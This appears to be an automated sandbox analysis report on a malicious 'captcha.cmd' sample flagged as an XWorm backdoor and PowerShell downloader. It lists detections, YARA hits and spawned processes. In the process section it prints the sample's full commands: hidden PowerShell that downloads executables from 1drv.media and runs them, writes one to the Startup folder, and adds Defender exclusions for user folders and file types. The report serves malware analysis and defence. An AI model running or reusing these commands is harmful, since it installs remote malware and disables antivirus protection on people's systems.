CreateProcessInternalW Oct. 29, 2024, 5:08 p.m.	thread_identifier: 2920 thread_handle: 0x000004e4 process_identifier: 2872 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004ec	1	1
ShellExecuteExW Oct. 29, 2024, 5:08 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	1	1

File has been identified by 8 AntiVirus engines on VirusTotal as malicious (8 events)

ALYac	Trojan.GenericKD.74354309
Symantec	Trojan.Gen.NPE
TrendMicro-HouseCall	Backdoor.PS1.XWORM.YXEJTZ
MicroWorld-eScan	Trojan.GenericKD.74354309
VIPRE	Trojan.GenericKD.74354309
TrendMicro	Backdoor.PS1.XWORM.YXEJTZ
Ikarus	Trojan-Downloader.PowerShell.Agent
Tencent	Win32.Trojan-Downloader.Downloader.Dplw

Checks for the Locally Unique Identifier on the system for a suspicious privilege (10 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 29, 2024, 5:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Creates an Alternate Data Stream (ADS) (1 event)

file	C:\Users\test22\AppData\Local\Temp\goto:eof

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Oct. 29, 2024, 5:08 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

powershell.exe tried to sleep 5456329 seconds, actually delayed analysis time by 5456329 seconds

A potential heapspray has been detected. 84 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

1350

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

One or more non-whitelisted processes were created (24 events)

parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe'
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/xc.exe' -OutFile 'C:\Users\test22\XClient.exe'; Start-Process -FilePath 'C:\Users\test22\XClient.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/clp.ps1' -OutFile 'C:\Users\test22\clp.ps1'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', 'C:\Users\test22\clp.ps1' -WindowStyle Hidden
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe'
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/qz.exe' -OutFile 'C:\Users\test22\qdll.exe'; Start-Process -FilePath 'C:\Users\test22\qdll.exe'
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath 'C:/Windows'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/GwKVGTzF/TGC.exe' -OutFile 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'; Start-Process -FilePath 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/cs.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGR.exe' -OutFile 'C:\Users\test22\TGR.exe'; Start-Process -FilePath 'C:\Users\test22\TGR.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest -Uri 'https://1drv.media/TGS.exe' -OutFile 'C:\Users\test22\TGS.exe'; Start-Process -FilePath 'C:\Users\test22\TGS.exe'
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath 'C:\Users\test22'; Add-MpPreference -ExclusionPath 'C:/Windows'
parent_process	powershell.exe	martian_process	C:\Users\test22\TGR.exe
parent_process	powershell.exe	martian_process	C:\Users\test22\TGS.exe
parent_process	powershell.exe	martian_process	C:\Users\test22\XClient.exe
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\test22\clp.ps1
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe
parent_process	powershell.exe	martian_process	C:\Users\test22\TGS.exe
parent_process	powershell.exe	martian_process	C:\Users\test22\qdll.exe

Creates a suspicious Powershell process (50 out of 52 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy

captcha.cmd

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All